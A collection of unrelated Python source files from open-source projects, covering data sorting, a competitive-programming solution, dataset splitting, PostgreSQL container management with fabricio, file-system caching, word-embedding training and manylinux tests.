'sections' : [(self.grprobj.hdrobj.secdflt, nts_flat)],
'hdrgo_prt':hdrgo_prt,
'flds':flds,
'num_items':len(nts_flat), 'num_sections':1}
# print('FFFF Sorter:get_desc2nts_fnc: nts_flat is None')
# RETURN: 2-D list [(section_name0, namedtuples0), (section_name1, namedtuples1), ...
# kws: top_n hdrgo_prt section_sortby
# Over-ride hdrgo_prt depending on top_n value
assert top_n is not True and top_n is not False, \
"top_n({T}) MUST BE None OR AN int".format(T=top_n)
assert self.sectobj is not None, "SECTIONS OBJECT DOES NOT EXIST"
sec_sb = self.sectobj.section_sortby
# Override hdrgo_prt, if sorting by sections or returning a subset of GO IDs in section
hdrgo_prt_curr = hdrgo_prt is True
if sec_sb is True or (sec_sb is not False and sec_sb is not None) or top_n is not None:
hdrgo_prt_curr = False
# print('GGGG Sorter:get_desc2nts_fnc: hdrgo_prt_curr({}) sec_sb({}) top_n({})'.format(
# hdrgo_prt_curr, sec_sb, top_n))
nts_section = self.sectobj.get_sorted_nts_keep_section(hdrgo_prt_curr)
# print('HHHH Sorter:get_desc2nts_fnc: nts_section')
# Take top_n in each section, if requested
if top_n is not None:
nts_section = [(s, nts[:top_n]) for s, nts in nts_section]
if section_prt is None:
nts_flat = self.get_sections_flattened(nts_section)
flds = nts_flat[0]._fields if nts_flat else []
return {'sortobj':self, 'flat' : nts_flat, 'hdrgo_prt':hdrgo_prt_curr, 'flds':flds,
'num_items':len(nts_flat), 'num_sections':1}
# Send flat list of sections nts back, as requested
if section_prt is False:
nts_flat = self.get_sections_flattened(nts_section)
flds = nts_flat[0]._fields if nts_flat else []
return {'sortobj':self, 'flat' : nts_flat, 'hdrgo_prt':hdrgo_prt_curr, 'flds':flds,
'num_items':len(nts_flat),
'num_sections':len(nts_section)}
# Send 2-D sections nts back
# print('IIII Sorter:get_desc2nts_fnc: nts_section')
flds = nts_section[0][1][0]._fields if nts_section else []
return {'sortobj':self, 'sections' : nts_section, 'hdrgo_prt':hdrgo_prt_curr, 'flds':flds,
'num_items':sum(len(nts) for _, nts in nts_section),
'num_sections':len(nts_section)}
@staticmethod
def get_sections_flattened(section_nts):
"""Convert [(section0, nts0), (section1, nts1), ... to [*nts0, *nts1, ..."""
nt_flds = list(section_nts[0][1][0]._fields)
# Flatten section_nts 2-D list
if 'section' in nt_flds:
return [nt for _, nts in section_nts for nt in nts]
# Flatten section_nts 2-D list, and add sections to each namedtuple
nt_flds.append('section')
nts_flat = []
ntobj = cx.namedtuple("Nt", " ".join(nt_flds))
for section_name, nts in section_nts:
for nt_go in nts:
vals = list(nt_go) + [section_name]
nts_flat.append(ntobj._make(vals))
return nts_flat
def get_nts_flat(self, hdrgo_prt=True, use_sections=True):
"""Return a flat list of sorted nts."""
# Either there are no sections OR we are not using them
if self.sectobj is None or not use_sections:
return self.sortgos.get_nts_sorted(
hdrgo_prt,
hdrgos=self.grprobj.get_hdrgos(),
hdrgo_sort=True)
if not use_sections:
return self.sectobj.get_sorted_nts_omit_section(hdrgo_prt, hdrgo_sort=True)
return None
@staticmethod
def get_fields(desc2nts):
"""Return grouped, sorted namedtuples in either format: flat, sections."""
if 'flat' in desc2nts:
nts_flat = desc2nts.get('flat')
if nts_flat:
return nts_flat[0]._fields
if 'sections' in desc2nts:
nts_sections = desc2nts.get('sections')
if nts_sections:
return nts_sections[0][1][0]._fields
# Copyright (C) 2016-2019, <NAME>, <NAME>, All rights reserved.
|
Codeforces/Lucky Mask/solution.py | rsrahul1000/Hack-CP-DSA | 205 | 12671094 | # Function to calculate the mask of a number.
def split(n):
b = []
# Iterating the number by digits.
while n > 0:
# If the digit is lucky digit it is appended to the list.
if n % 10 == 4 or n % 10 == 7:
b.append(n % 10)
n //= 10
# Return the mask.
return b
# Input the two input values.
x, y = [int(x) for x in input().split()]
# Calculate the mask of 'y'.
a = split(y)
# Iterate for value greater than 'x'.
for i in range(x + 1, 1000000):
# If mask equals output the integer and break the loop.
if split(i) == a:
print(i)
break |
robomimic/scripts/split_train_val.py | akolobov/robomimic | 107 | 12671123 | """
Script for splitting a dataset hdf5 file into training and validation trajectories.
Args:
dataset (str): path to hdf5 dataset
filter_key (str): if provided, split the subset of trajectories
in the file that correspond to this filter key into a training
and validation set of trajectories, instead of splitting the
full set of trajectories
ratio (float): validation ratio, in (0, 1). Defaults to 0.1, which is 10%.
Example usage:
python split_train_val.py --dataset /path/to/demo.hdf5 --ratio 0.1
"""
import argparse
import h5py
import numpy as np
from robomimic.utils.file_utils import create_hdf5_filter_key
def split_train_val_from_hdf5(hdf5_path, val_ratio=0.1, filter_key=None):
"""
Splits data into training set and validation set from HDF5 file.
Args:
hdf5_path (str): path to the hdf5 file
to load the transitions from
val_ratio (float): ratio of validation demonstrations to all demonstrations
filter_key (str): if provided, split the subset of demonstration keys stored
under mask/@filter_key instead of the full set of demonstrations
"""
# retrieve number of demos
f = h5py.File(hdf5_path, "r")
if filter_key is not None:
print("using filter key: {}".format(filter_key))
demos = sorted([elem.decode("utf-8") for elem in np.array(f["mask/{}".format(filter_key)])])
else:
demos = sorted(list(f["data"].keys()))
num_demos = len(demos)
f.close()
# get random split
num_demos = len(demos)
num_val = int(val_ratio * num_demos)
mask = np.zeros(num_demos)
mask[:num_val] = 1.
np.random.shuffle(mask)
mask = mask.astype(int)
train_inds = (1 - mask).nonzero()[0]
valid_inds = mask.nonzero()[0]
train_keys = [demos[i] for i in train_inds]
valid_keys = [demos[i] for i in valid_inds]
print("{} validation demonstrations out of {} total demonstrations.".format(num_val, num_demos))
# pass mask to generate split
name_1 = "train"
name_2 = "valid"
if filter_key is not None:
name_1 = "{}_{}".format(filter_key, name_1)
name_2 = "{}_{}".format(filter_key, name_2)
train_lengths = create_hdf5_filter_key(hdf5_path=hdf5_path, demo_keys=train_keys, key_name=name_1)
valid_lengths = create_hdf5_filter_key(hdf5_path=hdf5_path, demo_keys=valid_keys, key_name=name_2)
print("Total number of train samples: {}".format(np.sum(train_lengths)))
print("Average number of train samples {}".format(np.mean(train_lengths)))
print("Total number of valid samples: {}".format(np.sum(valid_lengths)))
print("Average number of valid samples {}".format(np.mean(valid_lengths)))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--dataset",
type=str,
help="path to hdf5 dataset",
)
parser.add_argument(
"--filter_key",
type=str,
default=None,
help="if provided, split the subset of trajectories in the file that correspond to\
this filter key into a training and validation set of trajectories, instead of\
splitting the full set of trajectories",
)
parser.add_argument(
"--ratio",
type=float,
default=0.1,
help="validation ratio, in (0, 1)"
)
args = parser.parse_args()
# seed to make sure results are consistent
np.random.seed(0)
split_train_val_from_hdf5(args.dataset, val_ratio=args.ratio, filter_key=args.filter_key)
|
Chapter02/01_NASDAQ_TotalView-ITCH_Order_Book/create_message_spec.py | kksonge/Hands-On-Machine-Learning-for-Algorithmic-Trading | 944 | 12671143 | <filename>Chapter02/01_NASDAQ_TotalView-ITCH_Order_Book/create_message_spec.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = '<NAME>'
import pandas as pd
df = pd.read_excel('message_types.xlsx', sheet_name='messages', encoding='latin1').sort_values('id').drop('id', axis=1)
# basic cleaning
df.columns = [c.lower().strip() for c in df.columns]
df.value = df.value.str.strip()
df.name = df.name.str.strip().str.lower().str.replace(' ', '_').str.replace('-', '_').str.replace('/', '_')
df.notes = df.notes.str.strip()
df['message_type'] = df.loc[df.name == 'message_type', 'value']
messages = df.loc[:, ['message_type', 'notes']].dropna().rename(columns={'notes': 'name'})
messages.name = messages.name.str.lower().str.replace('message', '')
messages.name = messages.name.str.replace('.', '').str.strip().str.replace(' ', '_')
messages.to_csv('message_labels.csv', index=False)
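# Forward-fill message_type so every field row is tagged with its message,
# then drop the message_type rows themselves.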
df.message_type = df.message_type.ffill()
df = df[df.name != 'message_type']
df.value = df.value.str.lower().str.replace(' ', '_').str.replace('(', '').str.replace(')', '')
def check_field_count(df):
"""Helper that validates file format"""
message_size = pd.read_excel('message_types.xlsx', sheet_name='size', index_col=0)
message_size['check'] = df.groupby('message_type').size()
assert message_size['size'].equals(message_size.check), 'field count does not match template'
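# Verify that each field's offset equals the previous field's offset plus its length.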
def check_field_specs():
messages = df.groupby('message_type')
for t, message in messages:
print(message.offset.add(message.length).shift().fillna(0).astype(int).equals(message.offset))
df[['message_type', 'name', 'value', 'length', 'offset', 'notes']].to_csv('message_types.csv', index=False)
|
mindspore_hub/info.py | mindspore-ai/hub | 153 | 12671161 | <filename>mindspore_hub/info.py
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
The information of network in mindspore_hub.
"""
from ._utils.check import ValidMarkdown
class CellInfo:
"""
Information of network.
"""
def __init__(self, md_path):
json_dict = ValidMarkdown(md_path).check_markdown_file()
self.name = json_dict.get('model-name')
self.backbone_name = json_dict.get('backbone-name')
self.type = json_dict.get('module-type')
self.fine_tunable = json_dict.get('fine-tunable')
self.input_shape = json_dict.get('input-shape')
self.author = json_dict.get('author')
self.update_time = json_dict.get('update-time')
self.repo_link = json_dict.get('repo-link')
self.user_id = json_dict.get('user-id')
self.backend = json_dict.get('backend')
if json_dict.get('allow-cache-ckpt') is not None:
self.allow_cache_ckpt = json_dict.get('allow-cache-ckpt')
self.dataset = json_dict.get('train-dataset')
self.license = json_dict.get('license')
self.accuracy = json_dict.get('accuracy')
self.used_for = json_dict.get('used-for')
self.model_version = json_dict.get('model-version')
self.mindspore_version = json_dict.get('mindspore-version')
self.asset = json_dict.get('asset')
self.asset_id = json_dict.get('asset-id')
|
Examples/Services/service_one/main.py | Mr-Victor/kivybits | 251 | 12671228 | <filename>Examples/Services/service_one/main.py
from time import sleep
from kivy.logger import Logger
import zipfile
from os.path import exists
class Waiter(object):
"""
This class simply waits for the update to finish and then closes.
"""
def __init__(self):
super(Waiter, self).__init__()
''' Hold a reference to the display wrapper class'''
self.counter = 0
def wait(self):
""" Start the loop where we wait for messages. """
while self.counter < 3:
Logger.info("service_one/main.py: counter = {0}".format(
self.counter))
sleep(.5)
self.counter += 1
Logger.info("service_one/main.py: count ended. About to open")
self.open_zip()
def open_zip(self):
""" Open a standard zip file. """
file_name = "service_one/main.zip"
if exists(file_name):
Logger.info("service_one/main.py: zip found. About to open.")
my_zip = zipfile.ZipFile(file_name, "r")
Logger.info("service_one/main.py: zip open. contains {0}".format(
my_zip.filelist))
Logger.info("service_one/main.py: zip examined. Exiting.")
else:
Logger.info("service_one/main.py: zip not found. Exiting.")
if __name__ == '__main__':
Waiter().wait()
|
dtale_desktop/file_system.py | dennislwm/dtale-desktop | 154 | 12671282 | import os
import shutil
from tempfile import mkdtemp
from typing import List, Callable, Tuple, Union
import pandas as pd
from typing_extensions import Literal
from dtale_desktop.settings import settings
__all__ = ["fs"]
_SENTINEL = object()
_TimeStampFormat = Literal["pandas", "unix_seconds", "unix_milliseconds"]
class _FileSystem:
ROOT_DIR: str
LOADERS_DIR: str
ADDITIONAL_LOADERS_DIRS: List[str]
CACHE_DIR: str
DATA_DIR: str
PROFILE_REPORTS_DIR: str
_instance = _SENTINEL
def __init__(self):
if self._instance is not _SENTINEL:
raise Exception("_Files is a singleton")
self._instance = self
self.ROOT_DIR = settings.ROOT_DIR
self.LOADERS_DIR = os.path.join(self.ROOT_DIR, "loaders")
self.ADDITIONAL_LOADERS_DIRS = settings.ADDITIONAL_LOADERS_DIRS
self.CACHE_DIR = os.path.join(self.ROOT_DIR, "cache")
self.DATA_DIR = os.path.join(self.CACHE_DIR, "data")
self.PROFILE_REPORTS_DIR = os.path.join(self.CACHE_DIR, "profile_reports")
self.create_directory(self.ROOT_DIR)
self.create_directory(self.CACHE_DIR)
self.create_directory(self.DATA_DIR)
self.create_directory(self.PROFILE_REPORTS_DIR)
self.create_python_package(self.LOADERS_DIR)
def create_directory(self, path: str) -> None:
os.makedirs(path, exist_ok=True)
def create_file(self, path: str, contents: str = "") -> None:
file = open(path, "w")
file.write(contents)
file.close()
def delete_file(self, path: str) -> None:
if os.path.exists(path):
os.remove(path)
def get_file_last_modified(
self, path: str, format: _TimeStampFormat = "pandas",
) -> Union[int, pd.Timestamp]:
ts = os.path.getmtime(path)
if format == "pandas":
return pd.Timestamp.fromtimestamp(ts)
elif format == "unix_seconds":
return int(ts)
else:
return int(ts) * 1000
@staticmethod
def _format_data_file_name(name: str):
return name if name.endswith(".pkl") else f"{name}.pkl"
def data_path(self, data_id: str) -> str:
return os.path.join(self.DATA_DIR, self._format_data_file_name(data_id))
def save_data(self, data_id: str, data: pd.DataFrame) -> None:
data.to_pickle(self.data_path(data_id))
def data_exists(self, data_id: str) -> bool:
return os.path.exists(self.data_path(data_id))
def read_data(self, data_id: str) -> pd.DataFrame:
return pd.read_pickle(self.data_path(data_id))
def delete_data(self, data_id: str) -> None:
self.delete_file(self.data_path(data_id))
@staticmethod
def _format_profile_report_name(name: str):
return name if name.endswith(".html") else f"{name}.html"
def profile_report_path(self, data_id: str):
return os.path.join(
self.PROFILE_REPORTS_DIR, self._format_profile_report_name(data_id)
)
def profile_report_exists(self, data_id: str) -> bool:
return os.path.exists(self.profile_report_path(data_id))
def read_profile_report(self, data_id: str) -> str:
with open(self.profile_report_path(data_id), encoding="utf-8") as f:
return f.read()
def delete_profile_report(self, data_id: str) -> None:
self.delete_file(self.profile_report_path(data_id))
def delete_all_cached_data(self, data_id: str) -> None:
self.delete_data(data_id)
self.delete_profile_report(data_id)
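    # Returns the new directory path together with a no-argument callback that
    # removes it again.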
def create_temp_directory(
self, folder_name: str = "temp"
) -> Tuple[str, Callable[[], None]]:
temp_dir = os.path.join(mkdtemp(), folder_name)
return temp_dir, lambda: shutil.rmtree(temp_dir)
def create_python_package(self, path: str) -> None:
if not os.path.exists(path):
self.create_directory(path)
init_file = os.path.join(path, "__init__.py")
if not os.path.exists(init_file):
self.create_file(init_file)
fs = _FileSystem()
|
tests/tests_models/test_activation_fn.py | TomF98/torchphysics | 203 | 12671292 | <filename>tests/tests_models/test_activation_fn.py
import pytest
import torch
from torchphysics.models.activation_fn import AdaptiveActivationFunction
def test_create_adaptive_with_tanh():
adap_fn = AdaptiveActivationFunction(torch.nn.Tanh())
assert isinstance(adap_fn.activation_fn, torch.nn.Tanh)
assert adap_fn.a == 1.0
assert adap_fn.scaling == 1.0
def test_create_adaptive_with_ReLu():
adap_fn = AdaptiveActivationFunction(torch.nn.ReLU(), inital_a=5.0, scaling=10.0)
assert isinstance(adap_fn.activation_fn, torch.nn.ReLU)
assert adap_fn.a == 5.0
assert adap_fn.a.requires_grad
assert adap_fn.scaling == 10.0
def test_forward_of_adaptive_activation():
input_x = torch.tensor([[1.0], [2.0], [-5.0]])
adap_fn = AdaptiveActivationFunction(torch.nn.ReLU(), inital_a=5.0, scaling=10.0)
output_x = adap_fn(input_x)
assert len(output_x) == 3
assert output_x[0] == 50.0
assert output_x[1] == 100.0
assert output_x[2] == 0.0
|
fabricio/apps/db/postgres.py | theoden-dd/fabricio | 291 | 12671308 | <gh_stars>100-1000
import multiprocessing
import os
from datetime import datetime
import six
from fabric import api as fab
from fabric.contrib import files
import fabricio
from fabricio import docker, utils
from fabricio.docker.base import Attribute
from fabricio.utils import Options
class PostgresqlBackupMixin(docker.BaseService):
"""
Your Docker image must have pg_dump and pg_restore installed in order
to run backup and restore respectively
(usually this requires `postgresql-client-common` package for Ubuntu/Debian)
"""
db_name = Attribute()
db_user = Attribute(default='postgres')
db_host = Attribute()
db_port = Attribute()
db_backup_dir = Attribute()
db_backup_format = Attribute(default='c')
db_backup_compress_level = Attribute() # 0-9 (0 - no compression, 9 - max)
db_backup_workers = Attribute(default=1)
db_restore_workers = Attribute(default=4)
db_backup_filename = Attribute(default='{datetime:%Y-%m-%dT%H:%M:%S.%f}.dump')
@property
def db_connection_options(self):
return Options([
('username', self.db_user),
('host', self.db_host),
('port', self.db_port),
])
@property
def db_backup_options(self):
return Options([
('if-exists', True),
('create', True),
('clean', True),
])
def make_backup_command(self):
options = Options(self.db_connection_options)
options.update(self.db_backup_options)
options.update([
('format', self.db_backup_format),
('dbname', self.db_name),
('compress', self.db_backup_compress_level),
('jobs', self.db_backup_workers),
('file', os.path.join(
self.db_backup_dir,
self.db_backup_filename.format(datetime=datetime.utcnow())
)),
])
return 'pg_dump {options}'.format(options=options)
@fabricio.once_per_task
def backup(self):
if self.db_backup_dir is None:
fab.abort('db_backup_dir not set, can\'t continue with backup')
command = self.make_backup_command()
self.image.run(
command=command,
quiet=False,
options=self.safe_options,
)
@property
def db_restore_options(self):
return self.db_backup_options
def make_restore_command(self, backup_filename):
options = Options(self.db_connection_options)
options.update(self.db_restore_options)
options.update([
('dbname', 'template1'), # use any existing DB
('jobs', self.db_restore_workers),
('file', os.path.join(self.db_backup_dir, backup_filename)),
])
return 'pg_restore {options}'.format(options=options)
@fabricio.once_per_task
def restore(self, backup_name=None):
"""
Before run this method you have somehow to disable incoming connections,
e.g. by stopping all database client containers:
client_container.stop()
pg_container.restore()
client_container.start()
"""
if self.db_backup_dir is None:
fab.abort('db_backup_dir not set, can\'t continue with restore')
if backup_name is None:
raise ValueError('backup_filename not provided')
command = self.make_restore_command(backup_name)
self.image.run(
command=command,
quiet=False,
options=self.safe_options,
)
class PostgresqlContainer(docker.Container):
pg_conf = Attribute(default='postgresql.conf')
pg_hba = Attribute(default='pg_hba.conf')
pg_data = Attribute(default=NotImplemented)
sudo = Attribute(default=False)
stop_signal = 'INT'
stop_timeout = 30
def update_config(self, content, path):
old_file = six.BytesIO()
if files.exists(path, use_sudo=self.sudo):
fab.get(remote_path=path, local_path=old_file, use_sudo=self.sudo)
old_content = old_file.getvalue()
need_update = content != old_content
if need_update:
fabricio.move_file(
path_from=path,
path_to=path + '.backup',
sudo=self.sudo,
ignore_errors=True,
)
fab.put(six.BytesIO(content), path, use_sudo=self.sudo, mode='0644')
fabricio.log('{path} updated'.format(path=path))
else:
fabricio.log('{path} not changed'.format(path=path))
return need_update
def db_exists(self):
return files.exists(
os.path.join(self.pg_data, 'PG_VERSION'),
use_sudo=self.sudo,
)
def create_db(self, tag=None, registry=None, account=None):
"""
Official PostgreSQL Docker image executes 'postgres initdb' before
any command starting with 'postgres' (see /docker-entrypoint.sh),
therefore if you use custom image, you probably have to implement
your own `create_db()`
"""
fabricio.log('PostgreSQL database not found, creating new...')
self.image[registry:tag:account].run(
'postgres --version', # create new DB (see method description)
options=self.safe_options,
quiet=False,
)
def update(self, tag=None, registry=None, account=None, force=False):
if not any(map(self.options.__contains__, ['volume', 'mount'])):
# TODO better check if volume or mount properly defined
fab.abort(
'Make sure you properly define volume or mount for DB data, '
'Fabricio cannot work properly without it'
)
if not self.db_exists():
self.create_db(tag=tag, registry=registry, account=account)
main_conf = os.path.join(self.pg_data, 'postgresql.conf')
hba_conf = os.path.join(self.pg_data, 'pg_hba.conf')
main_config_updated = self.update_config(
content=open(self.pg_conf, 'rb').read(),
path=main_conf,
)
hba_config_updated = self.update_config(
content=open(self.pg_hba, 'rb').read(),
path=hba_conf,
)
container_updated = super(PostgresqlContainer, self).update(
force=force,
tag=tag,
registry=registry,
account=account,
)
if not container_updated:
if main_config_updated:
self.reload()
elif hba_config_updated:
self.signal('HUP')
else:
return False # nothing updated
try:
# remove container backup to prevent reverting to old version
self.get_backup_version().delete(delete_image=True)
except docker.ContainerNotFoundError:
pass
if not main_config_updated:
# remove main config backup to prevent reverting to old version
main_conf_backup = main_conf + '.backup'
fabricio.remove_file(
main_conf_backup,
ignore_errors=True,
sudo=self.sudo,
)
if not hba_config_updated:
# remove pg_hba config backup to prevent reverting to old version
hba_conf_backup = hba_conf + '.backup'
fabricio.remove_file(
hba_conf_backup,
ignore_errors=True,
sudo=self.sudo,
)
return True
def revert(self):
main_conf = os.path.join(self.pg_data, 'postgresql.conf')
main_conf_backup = main_conf + '.backup'
hba_conf = os.path.join(self.pg_data, 'pg_hba.conf')
hba_conf_backup = hba_conf + '.backup'
main_config_reverted = fabricio.move_file(
path_from=main_conf_backup,
path_to=main_conf,
ignore_errors=True,
sudo=self.sudo,
).succeeded
hba_config_reverted = fabricio.move_file(
path_from=hba_conf_backup,
path_to=hba_conf,
ignore_errors=True,
sudo=self.sudo,
).succeeded
try:
super(PostgresqlContainer, self).revert()
except docker.ContainerError:
if main_config_reverted:
self.reload()
elif hba_config_reverted:
self.signal('HUP')
else:
raise
def destroy(self, delete_data=False):
super(PostgresqlContainer, self).destroy()
if utils.strtobool(delete_data):
fabricio.remove_file(
self.pg_data,
sudo=self.sudo,
force=True,
recursive=True,
)
class StreamingReplicatedPostgresqlContainer(PostgresqlContainer):
pg_recovery = Attribute(default='recovery.conf')
pg_recovery_primary_conninfo = Attribute(
default="primary_conninfo = 'host={host} port={port} user={user}'"
) # type: str
pg_recovery_port = Attribute(default=5432)
pg_recovery_user = Attribute(default='postgres')
pg_recovery_revert_enabled = Attribute(default=False)
pg_recovery_master_promotion_enabled = Attribute(default=False)
pg_recovery_wait_for_master_seconds = Attribute(default=30)
def __init__(self, *args, **kwargs):
super(StreamingReplicatedPostgresqlContainer, self).__init__(
*args, **kwargs)
self.master_obtained = multiprocessing.Event()
self.master_lock = multiprocessing.Lock()
self.multiprocessing_data = data = multiprocessing.Manager().Namespace()
data.db_exists = False
data.exception = None
self.instances = multiprocessing.JoinableQueue()
def copy_data_from_master(self, tag=None, registry=None, account=None):
pg_basebackup_command = (
'pg_basebackup'
' --progress'
' --write-recovery-conf'
' -X stream'
' --pgdata=$PGDATA'
' --host={host}'
' --username={user}'
' --port={port}'
''.format(
host=self.multiprocessing_data.master,
user=self.pg_recovery_user,
port=self.pg_recovery_port,
)
)
command = "/bin/bash -c '{pg_basebackup_command}'".format(
pg_basebackup_command=pg_basebackup_command,
)
self.image[registry:tag:account].run(
command=command,
options=self.options,
quiet=False,
)
def get_recovery_config(self):
recovery_config = open(self.pg_recovery).read()
primary_conninfo = self.pg_recovery_primary_conninfo.format(
host=self.multiprocessing_data.master,
port=self.pg_recovery_port,
user=self.pg_recovery_user,
)
recovery_config_items = [
row for row in recovery_config.splitlines()
if not row.startswith('primary_conninfo')
]
recovery_config_items.append(primary_conninfo)
return ('\n'.join(recovery_config_items) + '\n').encode()
def set_master_info(self):
if self.multiprocessing_data.exception is not None:
fab.abort('Task aborted due an exception: {exception}'.format(
exception=self.multiprocessing_data.exception,
))
fabricio.log('Found master: {host}'.format(host=fab.env.host))
self.multiprocessing_data.master = fab.env.host
def update_recovery_config(self, tag=None, registry=None, account=None):
db_exists = self.db_exists()
recovery_conf_file = os.path.join(self.pg_data, 'recovery.conf')
if db_exists:
self.multiprocessing_data.db_exists = True
if not files.exists(recovery_conf_file, use_sudo=self.sudo):
# master founded
self.set_master_info()
return False
fabricio.log('Waiting for master info ({seconds} seconds)...'.format(
seconds=self.pg_recovery_wait_for_master_seconds,
))
self.master_obtained.wait(self.pg_recovery_wait_for_master_seconds)
if not self.master_obtained.is_set():
if db_exists and not self.pg_recovery_master_promotion_enabled:
fab.abort(
'Database exists but master not found. This probably '
'means master failure. New master promotion disabled '
'by default, but can be enabled by setting attribute '
'\'pg_recovery_master_promotion_enabled\' to True.'
)
self.master_lock.acquire()
if not self.master_obtained.is_set():
if db_exists:
fabricio.move_file(
path_from=recovery_conf_file,
path_to=recovery_conf_file + '.backup',
sudo=self.sudo,
)
self.set_master_info()
return True
elif not self.multiprocessing_data.db_exists:
self.set_master_info()
return False
self.master_lock.release()
self.master_obtained.wait()
if not db_exists:
self.copy_data_from_master(
tag=tag,
registry=registry,
account=account,
)
return self.update_config(
content=self.get_recovery_config(),
path=os.path.join(self.pg_data, 'recovery.conf'),
)
def update(self, tag=None, registry=None, account=None, force=False):
if not fab.env.parallel:
fab.abort(
'Master-slave configuration update requires parallel mode. '
'Use Fabric\'s `--parallel` option to enable this mode '
'for a current session.'
)
self.instances.put(None)
try:
recovery_config_updated = self.update_recovery_config(
tag=tag,
registry=registry,
account=account,
)
container_updated = super(
StreamingReplicatedPostgresqlContainer,
self,
).update(force=force, tag=tag, registry=registry, account=account)
if not container_updated and recovery_config_updated:
self.reload()
self.master_obtained.set() # one who first comes here is master
return container_updated or recovery_config_updated
except Exception as exception:
self.multiprocessing_data.exception = exception
raise
finally:
try:
self.master_lock.release()
except ValueError: # ignore "released too many times" error
pass
self.instances.get()
self.instances.task_done()
self.instances.join() # wait until all instances will be updated
# reset state at the end to prevent fail of the next Fabric command
self.master_obtained.clear()
def revert(self):
if not self.pg_recovery_revert_enabled:
fab.abort(
"StreamingReplicatedPostgresqlContainer can not be reverted by "
"default. You can change this behaviour by setting attribute "
"'pg_recovery_revert_enabled'. BUT whether this attribute is "
"set or not, recovery configs (master-slave configuration) "
"will not be reverted anyway."
)
super(StreamingReplicatedPostgresqlContainer, self).revert()
|
remme/tp/context.py | FerrySchuller/remme-core | 129 | 12671330 | import logging
from google.protobuf.text_format import ParseError
from sawtooth_sdk.processor.exceptions import InternalError
from sawtooth_sdk.protobuf import state_context_pb2
from remme.settings import STATE_TIMEOUT_SEC
logger = logging.getLogger(__name__)
class CacheContextService:
def __init__(self, context):
self._storage = {}
self._context = context
def preload_state(self, addresses):
addresses = list(filter(lambda a: len(a) == 70, addresses))
entries = self.get_state(addresses)
for i, entry in enumerate(entries):
self._storage[entry.address] = entry.data
logger.debug(f'Stored data for addresses: {self._storage}')
def get_cached_data(self, resolvers, timeout=STATE_TIMEOUT_SEC):
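        """Yield one deserialized protobuf message (or None) for each
        (address, pb_class) pair, preferring locally cached state data."""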
for address, pb_class in resolvers:
try:
data = self._storage[address]
logger.debug('Got loaded data for address '
f'"{address}": {data}')
except KeyError:
try:
data = self.get_state([address])[0].data
self._storage[address] = data
logger.debug('Got pre-loaded data for address '
f'"{address}": {data}')
except IndexError:
yield None
continue
except Exception as e:
logger.exception(e)
raise InternalError(f'Address "{address}" does not '
'have access to data')
if data is None:
yield data
continue
try:
pb = pb_class()
pb.ParseFromString(data)
yield pb
except ParseError:
raise InternalError('Failed to deserialize data')
except Exception as e:
logger.exception(e)
yield None
def get_state(self, addresses, timeout=STATE_TIMEOUT_SEC):
return self._context.get_state(addresses, timeout)
def set_state(self, entries, timeout=STATE_TIMEOUT_SEC):
return self._context.set_state(entries, timeout)
def delete_state(self, addresses, timeout=STATE_TIMEOUT_SEC):
return self._context.delete_state(addresses, timeout)
def add_receipt_data(self, data, timeout=STATE_TIMEOUT_SEC):
return self._context.add_receipt_data(data, timeout)
def add_event(self, event_type, attributes=None, data=None,
timeout=STATE_TIMEOUT_SEC):
return self._context.add_event(event_type, attributes, data, timeout)
|
TWE-1/train.py | sysuhu/topical_word_embeddings | 330 | 12671349 | <reponame>sysuhu/topical_word_embeddings
#!/usr/bin/env python2
#-*- coding: UTF-8 -*-
#File: train.py
#Date: 20140810
#Author: <NAME> <<EMAIL>>
#Description Train the topic representation using the topic model and the word2vec's skip gram
import gensim #modified gensim version
import pre_process # read the wordmap and the tassgin file and create the sentence
import sys
if __name__=="__main__":
if len(sys.argv)!=4:
print "Usage : python train.py wordmap tassign topic_number"
sys.exit(1)
reload(sys)
sys.setdefaultencoding('utf-8')
wordmapfile = sys.argv[1]
tassignfile = sys.argv[2]
topic_number = int(sys.argv[3])
id2word = pre_process.load_id2word(wordmapfile)
pre_process.load_sentences(tassignfile, id2word)
sentence_word = gensim.models.word2vec.LineSentence("tmp/word.file")
print "Training the word vector..."
w = gensim.models.Word2Vec(sentence_word,size=400, workers=20)
sentence = gensim.models.word2vec.CombinedSentence("tmp/word.file","tmp/topic.file")
print "Training the topic vector..."
w.train_topic(topic_number, sentence)
print "Saving the topic vectors..."
w.save_topic("output/topic_vector.txt")
print "Saving the word vectors..."
w.save_wordvector("output/word_vector.txt")
|
tests/test_manylinux.py | hugovk/packaging | 388 | 12671442 | <reponame>hugovk/packaging
try:
import ctypes
except ImportError:
ctypes = None
import os
import platform
import sys
import types
import warnings
import pretend
import pytest
from packaging import _manylinux
from packaging._manylinux import (
_ELFFileHeader,
_get_elf_header,
_get_glibc_version,
_glibc_version_string,
_glibc_version_string_confstr,
_glibc_version_string_ctypes,
_is_compatible,
_is_linux_armhf,
_is_linux_i686,
_parse_glibc_version,
)
@pytest.fixture(autouse=True)
def clear_lru_cache():
yield
_get_glibc_version.cache_clear()
@pytest.fixture
def manylinux_module(monkeypatch):
monkeypatch.setattr(_manylinux, "_get_glibc_version", lambda *args: (2, 20))
module_name = "_manylinux"
module = types.ModuleType(module_name)
monkeypatch.setitem(sys.modules, module_name, module)
return module
@pytest.mark.parametrize("tf", (True, False))
@pytest.mark.parametrize(
"attribute,glibc", (("1", (2, 5)), ("2010", (2, 12)), ("2014", (2, 17)))
)
def test_module_declaration(monkeypatch, manylinux_module, attribute, glibc, tf):
manylinux = f"manylinux{attribute}_compatible"
monkeypatch.setattr(manylinux_module, manylinux, tf, raising=False)
res = _is_compatible(manylinux, "x86_64", glibc)
assert tf is res
@pytest.mark.parametrize(
"attribute,glibc", (("1", (2, 5)), ("2010", (2, 12)), ("2014", (2, 17)))
)
def test_module_declaration_missing_attribute(
monkeypatch, manylinux_module, attribute, glibc
):
manylinux = f"manylinux{attribute}_compatible"
monkeypatch.delattr(manylinux_module, manylinux, raising=False)
assert _is_compatible(manylinux, "x86_64", glibc)
@pytest.mark.parametrize(
"version,compatible", (((2, 0), True), ((2, 5), True), ((2, 10), False))
)
